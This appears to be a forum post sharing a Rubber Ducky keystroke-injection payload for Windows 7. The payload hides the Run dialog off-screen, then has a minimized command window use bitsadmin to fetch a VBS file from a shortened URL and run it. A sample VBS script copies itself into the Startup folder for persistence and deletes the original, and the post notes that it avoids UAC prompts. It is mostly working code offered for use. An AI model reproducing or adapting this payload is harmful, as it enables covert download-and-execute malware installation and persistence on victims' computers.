I have tested this on windows 7, but nothing else. Still need to test what happens if you run this from a crazy locked down account, but so far it seems to work fine without ever prompting for UAC or complaining about permission issues.
REM This payload will download a given file, save it to the user's home directory, and execute it. Works great for VBS files.
REM Make sure the file terminates quickly, as the window will stay open until it does. But the window will be blank and minimized.
DELAY 10000
GUI r
DELAY 200
REM Move the run dialog out of the way
ALT SPACE
DELAY 20
STRING M
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 10
ENTER
REM Start the download and execution
STRING cmd /c start /min cmd /c "cmd /T:01 /Q /c bitsadmin /rawreturn /transfer a http://bit.ly/42z1aRg %userprofile%/pl.vbs & %userprofile%/pl.vbs"
ENTER
Sample code for the VBS file to ensure it terminates quickly, deletes the original, and also enables auto run on machine startup:
' Find the logged in user's startup folder
set WshShell = WScript.CreateObject("WScript.Shell" )
strStartup = WshShell.SpecialFolders("StartMenu")
' See if we are running from the copy in the startup folder
if (WScript.scriptName <> "helper.vbs") Then
' We are not, so copy this file into the startup folder
dim filesys: set filesys=CreateObject("Scripting.FileSystemObject")
filesys.CopyFile WScript.ScriptFullName, strStartup + "\programs\startup\helper.vbs"
' Delete the original
filesys.DeleteFile(WScript.ScriptFullName)
' Now execute the copy in the startup folder (asynchroniously, so we dont hang waiting for it to finish)
WshShell.Run("""C:\Windows\System32\wscript.exe"" """ + strStartup + "\programs\startup\helper.vbs""")
' We have a copy running from a different process now, so we can quit this one
WScript.Quit
End If
' Do the rest of your vbs payload here.
So when this runs, the ducky script will open a run prompt. Enter 115 chracters. A blank CMD window will open and minimize, then sit there for a second. While its open, in the background its downloading the vbs file from a remote server, copying it to the user's directory, and executing it. The vbs script will copy itself to the user's startup directory, execute the copy, and terminate itself. At that time, the CMD window (still blank and minimized) will close. You now have a VBS script that will run on startup, and can run for as long as you need as a background process.